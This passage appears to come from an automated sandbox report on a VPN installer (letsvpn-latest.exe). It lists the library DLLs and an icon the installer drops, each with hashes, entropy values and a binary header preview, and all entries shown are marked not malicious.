Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ..............................tC....@..................................(..O....@..4................+...`......h'............................................... ............... ..H............text........ ...................... ..`.rsrc...4....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......`...#Strings....p.......#US.t.......#GUID...........#Blob......................3................................................../...q./...E.....O.....Y.................X...........'.....p...........B.....+...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.8...K.X...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.Timer.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.889393529322428
Encrypted:	false
SSDEEP:	384:mFz0Q6gcqRhcsMWdMW/wpwKANynsAw/98E9VF3AM+oQRhSAnAI:mFz1c6/Aw/KENAMxFAN
MD5:	52A8DF0DF20D4E4C72107C7A82935773
SHA1:	178D2F122689F07098CEC8D526A330C0D02F62B1
SHA-256:	58FF8C50A179DB011F34964FFD747A9C8CB280C074CCEEF7436B298633AB17F9
SHA-512:	8AE6B87E1086C430D9C12220354E4332DA114D267BDC8A07F61D24EC3A890FE869D678F80230658BE0089B66C00A4EE46CDB78C1B6CF3E77BB74204DB0FDB91E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ..............................\|.....@.................................L(..O....@...................+...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..D....................&......................................BSJB............v4.0.30319......l.......#~......,...#Strings.... .......#US.$.......#GUID...4.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	17384
Entropy (8bit):	6.78331502201167
Encrypted:	false
SSDEEP:	384:G6xWA3W4aW/NW1xpwKANynsAw/98E9VF3AM+olHSDWo42:GaB1Aw/KENAMxZSDq2
MD5:	98682F0CEFC51030D2EE76866B2D4029
SHA1:	F47F43A44BACF0DAD4D66BDFCE8D406821973AFF
SHA-256:	2C81B75DEA691B6DB2514146F85821EAD16C18E84FBDA68A6010FA7D69B2A969
SHA-512:	400C139C7F2C12260E66FC498AF1FA718C624EDA53DCCAD1B33ECD0B8BAB0068A907B7C49A99986A4FD12DA3BF9B048F7762EFD28F5E8EA20104B22D1B6EEDFB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............,... ...@....... ...............................B....@..................................+..O....@...................+...`...................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......P .............................................................BSJB............v4.0.30319......l... ...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................-.........O.k.....k.....X.....................1...........o.........................B...........9...........J.....J.....J...).J...1.J...9.J...A.J...I.J...Q.J...Y.J...a.J...i.J...q.J.......................#.....+.....3.....;.....C.-...K.M...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.ValueTuple.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	74216
Entropy (8bit):	5.952655867460952
Encrypted:	false
SSDEEP:	1536:mIumja0tbe16pSc45EfL+4vD4SuJbhjXuE3FMqF1KAy4kHo05ureseh79BAwrxR:mIuAaGbeGq5rKASI0IChBhz
MD5:	0AB734A059B8A7A35BB486D746B8690F
SHA1:	7EC8D01ABB66672657D2FF8B064CA88E6003BF18
SHA-256:	F1F5F7EA3526F7ED0290FAA00573ED2619E234891D10148F58695B9CAAB8DF30
SHA-512:	D40885E9A00FC8110C5B23950B265F994E03048A3369DA5CC694975B464DCBED42E4FB8AF04E0D4CF5198886821DFE6C44B38BDD5916B472F192411C51858F95
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.............~.... ... ....... .......................`............@.................................,...O.... ..x................+...@....................................................... ............... ..H............text........ ...................... ..`.rsrc...x.... ......................@..@.reloc.......@......................@..B................`.......H.......................d.......t.......................................6..o.........f..o...........o............o...........o...........o............o...........o...........o ...........o!...........o"..........o#..........o$...........o%...........o&............0..L.........o'..........o(..........o)...........o...........o+...........o,.........0..Y.........o-..........o...........o/...........o0...........o1...........o2...........o3.... .......0..k.........o4....

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Web.Services.Description.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	18408
Entropy (8bit):	6.764218616884775
Encrypted:	false
SSDEEP:	384:/vx21MWeLqWYFpwKANynsAw/98E9VF3AM+o/7W:/J2WfAw/KENAMxK
MD5:	B9AC9A5E32A5CC5BE9D5FE05183594E9
SHA1:	BC9E3A9BA0FCC25EFB2C4A37BD6D42E27902E003
SHA-256:	3A73C973BDDE70F6EF8027D6015448F3B762D7F7B2433FCE1B235E95D77D8EC4
SHA-512:	184362A3E67C103F33C812082373BCD7CDE56CC45D6F057FF886C78E77C06957DE77A4DBFC8E129FE996051657E260778AB246EF0046E4CCB6B0E9D1A1FAC3C6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s.~..........." ..0.............:1... ...@....... ....................................`..................................0..O....@...................+...`......./..T............................................ ............... ..H............text...@.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................1......H.......P .. ...................p/......................................BSJB............v4.0.30319......l...h...#~..........#Strings............#US.........#GUID.......4...#Blob......................3................................F...............4.c.....c...o.<...............U...........m.......................T.............2.................6.....6.....6...).6...1.6...9.6...A.6...I.6...Q.6...Y.6...a.6...i.6...q.6.......................#.....+.*...+.F...+.\...3.r...;.....C.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Windows.Interactivity.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	51176
Entropy (8bit):	6.240820708447174
Encrypted:	false
SSDEEP:	1536:/3wBccZdxuB8mQen6JxKjrlMZgR0EoOAwrxS:vcHmQPUkOhw
MD5:	80866CD6502A9D91428C49FC8FB36416
SHA1:	CD2D2CBAC6DF3A373F70101AAD62CCBAD14C13DC
SHA-256:	525114F24029CA5190C757062E44EDD67B97473EC86ED7EF8C3EED6EDCDAAC50
SHA-512:	EEC2909FAF99F85A99F25B646EB596ABA3E596697C514FEA526458DE0529CAB54A16D6F4A6D654734F0F4BF5EDF214903032EA569058185E0E8FFC8FCE51E383
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...du.K...........!..................... ........ ;. ....................................@.................................\...O........................+........................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......4O..X`..........xD......P ......................................{c...2......q..Z,.C.....3.n.Z..7....R.....T.{yF")i.$JMv...,a.....U...M:,...Z.Q:..c..N.{....<....h%.....:s..T...Z.gSI.....6.(.....{.......0..&........(..............s....o.....s....}.......0..K........(.....{....o........,3..+&..( .........{.....o!..............X...(....2...0..L........{.....o"...,=(#...(..................($...o%.......(&...o%.....('...s(...z*.0...........o).......E............d

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Xml.ReaderWriter.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.90491148831205
Encrypted:	false
SSDEEP:	384:Or97WquWjhpwKANynsAw/98E9VF3AM+obFl:ORJEAw/KENAMxj
MD5:	88B01692B46FE2F201F91366FAD7E908
SHA1:	4B1DE540BBBAD79455B21B9361B6CDF465F983CF
SHA-256:	5D1979961DA9D938CBF578F8A847D4159A8640FC313CCC771B345567CFCD5EFE
SHA-512:	5A8229E6FCAB6434445492B40B4C30392318F619D8BEAF2F05E5FBBAFE94D6E28D8155673E29A58D3BC2E6482D44BDF31E43BDA377A682E731B4C29AE503EE0D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............+... ...@....... ...................................@.................................\+..O....@...................+...`......$*............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......P ..T....................)......................................BSJB............v4.0.30319......l.......#~..T.......#Strings....0.......#US.4.......#GUID...D.......#Blob......................3......................................z...........j.....j.....W...............B.....z.............................................................Q.....Q.....Q...).Q...1.Q...9.Q...A.Q...I.Q...Q.Q...Y.Q...a.Q...i.Q...q.Q.......................#.....+.....3.....;.....C.4...K.T...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Xml.XDocument.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.851482900898342
Encrypted:	false
SSDEEP:	384:Y16eWLDW3CpwKANynsAw/98E9VF3AM+o2C+d:g6LqAw/KENAMxad
MD5:	89B44404F8298AFFDBC7FF174F442DDF
SHA1:	25CD59251DF4328BE8B1B9144B90D57B0A86EBDB
SHA-256:	9EA9286DDAF4ACDA11284362B3E3C5C65F289FF3DF6B680CB7476E929AA589CB
SHA-512:	A5D7B68D6C2E84DD6EA4047D5978C98DA5804FC1A3B93E30737FBF6ED5F1D2522E5647E700564AEB6A7C162EBCCF2878DAF9FA3EFA313FB7F90D2E801E86EAF5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0................. ...@....... ....................................@.................................\|..O....@...................+...`......D)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ..t....................(......................................BSJB............v4.0.30319......l.......#~......8...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3..................................................z.....z...u.g.................................>.....W.................r.....[...................a.....a.....a...).a...1.a...9.a...A.a...I.a...Q.a...Y.a...a.a...i.a...q.a.......................#.....+.....3.....;.....C.1...K.Q...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Xml.XPath.XDocument.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	17896
Entropy (8bit):	6.843882988196922
Encrypted:	false
SSDEEP:	384:HY8G4YC2W+wW8WpwWxUpwKANynsAw/98E9VF3AM+oQ4fTmr:HjGZ5xAw/KENAMxw
MD5:	BACB698D88F26E656D6C42D0E0537A51
SHA1:	E1BF00B8D7AC8EEB88D7759D944235AA7F81A609
SHA-256:	3D83845CF4EE08017DC971F361CEBFB55CC98D369210B5AC1D910932FC91EB8B
SHA-512:	ADCFC1392EDC624C1C74E4B681037211D790B310BDDD5AB238A614C0B9C6B56458A3DBE29E98A946AD9F078FE5BB95F290954514C722FCBA643A8C2EA80606A7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............+... ...@....... ....................................@.................................z+..O....@..x................+...`...................................................... ............... ..H............text........ ...................... ..`.rsrc...x....@......................@..@.reloc.......`......................@..B.................+......H.......t ......................P........................................s....:.(......}....2.{....(....*BSJB............v4.0.30319......l.......#~..0.......#Strings............#US.........#GUID...........#Blob...........WW.........3..............................................................L.........4.H...}.H...u.v...........;...........;...=.;.................../.%...........P.....m.....................................v...S.......v...d.v...........v...m...............

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Xml.XPath.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.947021415380896
Encrypted:	false
SSDEEP:	384:B6ziqTEkGWvRW67pwKANynsAw/98E9VF3AM+oxLJcC+w3R:BYT1kAw/KENAMxcC/h
MD5:	1CEAC27FDB0F2D030AC6BBAD54142E4B
SHA1:	D07B4632A71349EC5B32CC7742D273C5584C8238
SHA-256:	F148D8286C890468B3B7E4ABBFCFFD8D7A46609F7A35819390A4CC02EA088638
SHA-512:	ABE58CE1B68388A031057C182EFBD95B8FD0783D1B9FA06C8B2A74D5475A5CC794EB030240261CADDDE70002AE9706A0AA5314775DC034AC31E429A17E08F006
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ....................................@..................................)..O....@...................+...`......d(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...0...#~..........#Strings....x.......#US.\|.......#GUID...........#Blob......................3................................................'...........~...................................G.....`.................{.....d...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.-...K.M...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Xml.XmlDocument.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.866181828112814
Encrypted:	false
SSDEEP:	384:/Uv7c7iWNCWzIpwKANynsAw/98E9VF3AM+oSje6V31o2:/M7c11Aw/KENAMx2e61y2
MD5:	6707533500FC64115A39DB26979FA539
SHA1:	FA5638550E60177FFAF2B3AE0A7FFBE86BB003BF
SHA-256:	3F4C126146F0F1ADB99CC51F46350D18BB972D8AA4361011C78E01943FE923D1
SHA-512:	B075B4B6DB1C5417C013B5D15BC28EA59F34245C91A03054DF229CC102C2FC5486AA9E96DF273C6BCE4F48F7C61D2496CDD9DFA52068C21A8FA8D6B3EDF6EFCD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C..Y.........." ..0................. ...@....... ...................................@....................................O....@...................+...`......`)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l.......#~......l...#Strings....l.......#US.p.......#GUID...........#Blob......................3................................................4...........~.............H.....H.....H.....H...T.H...m.H.....H.....H.........d.H.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Xml.XmlSerializer.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.907371376742411
Encrypted:	false
SSDEEP:	384:bSWnRWAlpwKANynsAw/98E9VF3AM+orlbDhL:bzkAw/KENAMx5bVL
MD5:	4884E27B9B813AF08924E6BE157FDF80
SHA1:	9E79A246FC2D1555EB8D826DAF231492AAB0EDE0
SHA-256:	9B8A33B04EE86AFB4B382F28A686DC1316E13CFE7893494B65D6BE901C1CB8C7
SHA-512:	A64F2BAE6DDAFE4FE0680F0EE43BD26D9FDAEEFC0A115FEBCFD906C522CA02E330F58389A381E6EAC2193D6184A268C9CA9B3977496DA3EC096B32D315BE0DA2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C..Y.........." ..0..............+... ...@....... ....................................@.................................L+..O....@..$................+...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...$....@......................@..@.reloc.......`......................@..B.................+......H.......P ..D....................)......................................BSJB............v4.0.30319......l.......#~..........#Strings.... .......#US.$.......#GUID...4.......#Blob......................3..................................................k.....k...U.@.........i.....=.........................................&.....'...................:.....:.....:...).:...1.:...9.:...A.:...I.:...Q.:...Y.:...a.:...i.:...q.:.......................#.....+.....3.....;.....C.5...K.U...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\ToastNotifications.Messages.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	101352
Entropy (8bit):	4.716134808418194
Encrypted:	false
SSDEEP:	768:VHmt9tmMLbLR6330XUb9GYQpAw/KENAMxgmvNAR:V+d6336UbILpAwrxg8A
MD5:	718E6F271AE8153C7E46693B9C4DFDF7
SHA1:	CAA72B318CCB7E7D9AEAF8660052C5605831A113
SHA-256:	6E35E281509F58C35AACD80A8BB0BDC85C5DB63A1B6B79645E11202684409CB8
SHA-512:	6771A6D3D971EBED2D029B547DD895E75289CE5C28497A9009CEA283E482BE22415A4F7E6DB4556C192300B3A823CBD352CD953743A2A3310B8AD2E9D48EC45D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\.........." ..0................. ........... ....................................@.....................................O...................`...+........................................................... ............... ..H............text...0.... ...................... ..`.rsrc..............................@..@.reloc...............^..............@..B........................H........(..."...........J..p... ........................................0.. .......s7......}........8...s....o...+.0..'.......s9......}......}........:...s....o...+..0.. .......s;......} .......<...s....o...+.0..'.......s=......}!.....}".......>...s....o...+..0.. .......s?......}#.......@...s....o...+.0..'.......sA......}$.....}%.......B...s....o...+..0.. .......sC......}&.......D...s....o...+.0..'.......sE......}'.....}(.......F...s....o...+R.(.....(......(...+2.(.

C:\Program Files (x86)\letsvpn\app-3.7.0\ToastNotifications.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	120808
Entropy (8bit):	5.068062171449719
Encrypted:	false
SSDEEP:	768:Jr7hqeNzclb+af/wFGfdpOOJWOQE9/TBLW/UwmoAw/KENAMx5PF:Jr7hqeNzclR/CWpKsRBLW/EoAwrx5PF
MD5:	785A703389559E49A08BAA4401BD45F2
SHA1:	60FC997153F12C8DB5467AB64F756CA8ED059113
SHA-256:	DABE14E7ABE508B97134E9850DBBE27A4533A684ACFB891631C197BB9CCD7FAB
SHA-512:	F4133F76DE3ECC18AE358DF3D6C434A6C8AB68DDDB684195F543FF18C32582FB8D2DD57167B4E8CCE25A0FDA5C2C3B2D84C2847D769D8FDE5754740FE2182864
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\.........." ..0..$...........C... ...`....... ....................... ......#.....@..................................C..O....`...................+..........hB............................................... ............... ..H............text....#... ...$.................. ..`.rsrc........`.......&..............@..@.reloc..............................@..B.................C......H........N...n..................A......................................f.s....}.....(......}....v.(.....{.....o.........o.....0...........{..........(.....{....,..k.(......o....%-.&s.......}......o....}.....{.....o....o......o.....o.....o.....o.....s....}.......,..(..............s\|.......0..T.......s....%(....o....o......{.....o.....o....-.r...pr'..ps....z.o....-.re..pr'..ps....z.J.{....%-.&.o......{....*..0..M........{....-D..}.....{....%-.&+.(....%-.&+.o.....{....%-.

C:\Program Files (x86)\letsvpn\app-3.7.0\Utils.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	130536
Entropy (8bit):	5.964318353666981
Encrypted:	false
SSDEEP:	3072:s/FN+AQPoaBBzp/1e9YbCW1NtLGi/yOqi1/Xg6iyhUkuIqhk:stuouH/67Xhk
MD5:	45732388F391D4D629F5F937F81800E6
SHA1:	F499DC39BB22D1EB36428C0804D397807458659E
SHA-256:	BE173837D34711ED61EAFEC422463BCD27D7624B21FBA9D41C72738EBF8DC1BE
SHA-512:	2BE81D7688C1FB6963AE5DB80144337B90701FF718F4920751A993AB37013B0817C647AF766F852E8FFF549DB540666EA90FC5F8419EBE0632C18C92F6EC012D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... .......................@...........`.................................m...O.......P................+... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P...........................@..@.reloc....... ......................@..B........................H.......<....8...........................................................0..........s......(9....j........(:...&...(.......0o.........+,.....o ...o!...o"...&...2..r...po"...&...Y...../..0...r...p(#.....(1....r5..po"...&...o$...o"...&...o$.............ag.0.....0..j.......~%....rQ..prY..ps&...%.o'...%.o(...%.o)...(.....o+...o,.......,..o-........r_..p(#....(1...r...p.s....z.*........0..>..........DJ.......0..........s/....(......l...%....%....o0......+r.....(1...-b...l...%..

C:\Program Files (x86)\letsvpn\app-3.7.0\View\Assets\notification_icon.png

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PNG image data, 256 x 256, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	12243
Entropy (8bit):	7.820583648387655
Encrypted:	false
SSDEEP:	192:WLj1H8FzmdclL4jx3c4yrJuhRof6YQURyMGf0gDSvGrEHsf8Aw47b:QpiYccZrZRof6YQUPPgDSvGr+q8D47b
MD5:	AA3CFA4A176584F79EEE7F74032E446F
SHA1:	752B97FF9A8D28E92F6FB35EE24FF3DA2E8DEEE5
SHA-256:	34A9425F58EDB250E7FBD9217D73A5AD96D1986ACA3520AFE8CADB66E32E3F33
SHA-512:	A824DA84DEDAFCDCEACDF9D602B5F89526168E6350E7478D31A5562A8B12D496FB5205B62EDFB2DF1C3896D6B24DA761A1211CF342C1AFF8E6235C4569A54BFF
Malicious:	false
Preview:	.PNG........IHDR.............k.XT....PLTE....g.H.\...O..E..E.jj..D..E.Q..rb.S...D.tc..H.H.P..ni.T..S...H.Q...F.N..L.N...E.....D.M..Y..yS.uW.O..S..ig.q[..D..H....}P.lc..D.T..bv.en.gk.n_.Q..]...L..D.D.D.D.[...N..D.F.[..cr..D.V...E.D.D.Y...D..D.P.._}..L..D..C..D..D.D.W...D.G.I..D.`z..D..D..E.D.m...D..D..C..G.o...C..N..O.w{.t...[.j..]...R.q..c...U..Q..N..i..Y..`..S..N.zw..n..N.g...N..N.\|r..N.N.....V..N..N....^..a..d...N.g......N.N.O..N.M.O.O.d..O.......U...N....z?.LN.n>....O..w..kb...eP.`2.`D.sq.........7.....W.w^.T=...sJ....f..xj....bk..$.....&.[[..&....g$.....u...m.....B......Vj..8.I....'.mx......1.k..Oy.........j.... .:..Fb..1....\.....@u.. .....H.L...f.-.........I.t".......g..1....G...(.E..........8..w...y....9..I.....i..............k......}...b..E.....tRNS..-.L...O...QQ..........'^..,iIDATx...MH.A.....].U3.Xw....B.2..K...A..i.%F...BWA..3.K..H...u.P...C..I..K..<...w....C_........>.../...+*+..v.@m..N.X.XG.qt.i.k+...(jXQ

C:\Program Files (x86)\letsvpn\app-3.7.0\WebSocket4Net.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	73192
Entropy (8bit):	6.249748321991057
Encrypted:	false
SSDEEP:	1536:oXSaVnItYw1N0tUUTAz/kI5JIol/NkIgJ4WoAwrxm:o5VnqzNaNE4IvIolSIgJjohg
MD5:	06FC5706D827C0D089D3C87DF503B557
SHA1:	0A14CE3E4FE3BA1064ECF8EBB9A622E6F8DABF98
SHA-256:	74F911F6A915C5BB2268EC8F71E06ED6F89178650F4C7C613C779DD99CB719AA
SHA-512:	C14E2C487948FCEAB72E17D5A53C6554F402D9494937ACBD1584C35278069193BE8F00D965395CE9B0F2C8F608D39DF641BF86EA5F42033E949395CFA87E4C50
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...FqZ.........." ..0.............V.... ... ....... .......................`............`.....................................O.... ..4................+...@....................................................... ............... ..H............text...\.... ...................... ..`.rsrc...4.... ......................@..@.reloc.......@......................@..B................6.......H.......4k...............................................................{...."..}......{...."..}....V.(......(......(....:.(......(......{...."..}....Z...o....&.~....o....&Z...o....&.~....o....&V..o....&.~....o....&6.~....o....&...0...........~....Q..~......s.....8.....P(....,...Q8.....r...po....,..(....-&....o....-.......o....( ...o!...8......:o"........?........o#.......(....-...o..........Xo$.......(....-"..r...po....,...o%....1....o$.......(....-1.....o....

C:\Program Files (x86)\letsvpn\app-3.7.0\WindowsInput.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33768
Entropy (8bit):	6.4025329384270835
Encrypted:	false
SSDEEP:	384:ap0c3XP4cGqWpMgtZvtxsoOaY2ZXnFq+3xfJBRGCVoCpwKANynsAw/98E9VF3AM8:aqsQtqwMkbvnFqqPgq4Aw/KENAMxJY
MD5:	EE295B444AFECBF42526BD136DEE4002
SHA1:	E490EC5B8BC823CAF487DC02CA82003964E08276
SHA-256:	ED46BDF66B27421E70CDC2D0C334A3F09818173790732061C36C5301C37737AF
SHA-512:	7D0E0D5929D38F67C772CC96307DA7E08DC7D09629F2A14354DEA883895515CF2C490A6D8C94E317329FD6173906A4D1B5E981A1AB4656B90578C27168F10577
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......R...........!.....N..........>m... ........... ....................................@..................................l..W....................X...+...........k............................................... ............... ..H............text...DM... ...N.................. ..`.rsrc................P..............@..@.reloc...............V..............@..B................ m......H......../...;..................P ......................................`.R...~d.5.......eQ..........EG2..D9.p....WPu.s.\|nn....1.....F..V7..W.(....od,...........!8....W..ez..e..Q.....h..:`...Qgr.(......}......}......}......(......sf...}......s....}.....s~...}......{......{......{......(.....-.r...ps....z..}.....s....}.....0..c........(.....-.r...ps....z.-=r...p.....(....o.........(....o.........(....o....(....s....z..}......}....2.{....o....6.{.....o=...*...0..

C:\Program Files (x86)\letsvpn\app-3.7.0\WpfAnimatedGif.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	53736
Entropy (8bit):	6.343120471435367
Encrypted:	false
SSDEEP:	768:nhDcl7W1UiZTo1ooEqzW3SQwiNsI8l5wwyvUPrYZBkcDfAw/KENAMxbUk:nh8QpZTsooEX3SQwr9y4UZRDfAwrx1
MD5:	F0B78CE643F8890B64A36B25D0BE40FD
SHA1:	6A61E2C668474CCEC69346A2053D0A02A809EAD5
SHA-256:	6682680A9655BD129B62025FA2E3B6C0B158E8B0F0122243DD8154377A43184F
SHA-512:	418CD88B99CA3AA49D2CA532FCB2FBF341A94D8FC3935D3D0229761C945F0EE4A287ADDC6D759F78D65C333A58B55102AB43DB4D64F178F192EE2C2E7929BCB2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5............" ..0.................. ........... ....................................@.................................J...O.......$................+..........h...T............................................ ............... ..H............text........ ...................... ..`.rsrc...$...........................@..@.reloc..............................@..B................~.......H........H..Hq...........................................................{......{....V.(......}......}.......0..;........u......,/(.....{.....{....o....,.(.....{.....{....o...... ...' )UU.Z(.....{....o....X )UU.Z(.....{....o....X.0...........r...p......%..{.....................-.q.............-.&.+.......o ....%..{.....................-.q.............-.&.+.......o ....(!....0..2..........(....~.......o"...-.~.....s#...%.o$.....o%...&...0..A..........(....~.......o"..

C:\Program Files (x86)\letsvpn\app-3.7.0\arm64\WebView2Loader.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32+ executable (DLL) (console) Aarch64, for MS Windows
Category:	dropped
Size (bytes):	126440
Entropy (8bit):	6.088128254176655
Encrypted:	false
SSDEEP:	1536:eDdMkQCUK86ryzDWs0MxThVvTe6sWkddGDGEtg3q2LOOCN+HAwrx73:eDdef+yR17exwDGEtg3q2LOdN+HhV
MD5:	91864DB7B724160E80E702DF93313006
SHA1:	8926004BE47BF37D940C6078B98E546D179C8F59
SHA-256:	8DA336ADBFEC70C5565EA72597925C4CC1B4FD254E259E940F5AC43760E15F7E
SHA-512:	BE6F53F65F656C1904C07F72F0AADFE9FEE30807C1A7C8F9B5F0EAC8709A350012753B2F0F84F5F1F23525C25447FE725587FCF86EEC153D7EB29FD46A4F1904
Malicious:	false
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......`.........." ................ C....................................... ......S.....`A........................................_.......Q...(...............(........+......\|..........................@...(... !..0...................P........................text............................... ..`.rdata...... ......................@..@.data...\|...........................@....pdata..(...........................@..@.00cfg..............................@..@.tls................................@....rsrc...............................@..@.reloc..\|...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\letsvpn\app-3.7.0\cs\System.Web.Services.Description.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	20456
Entropy (8bit):	6.7368967869819905
Encrypted:	false
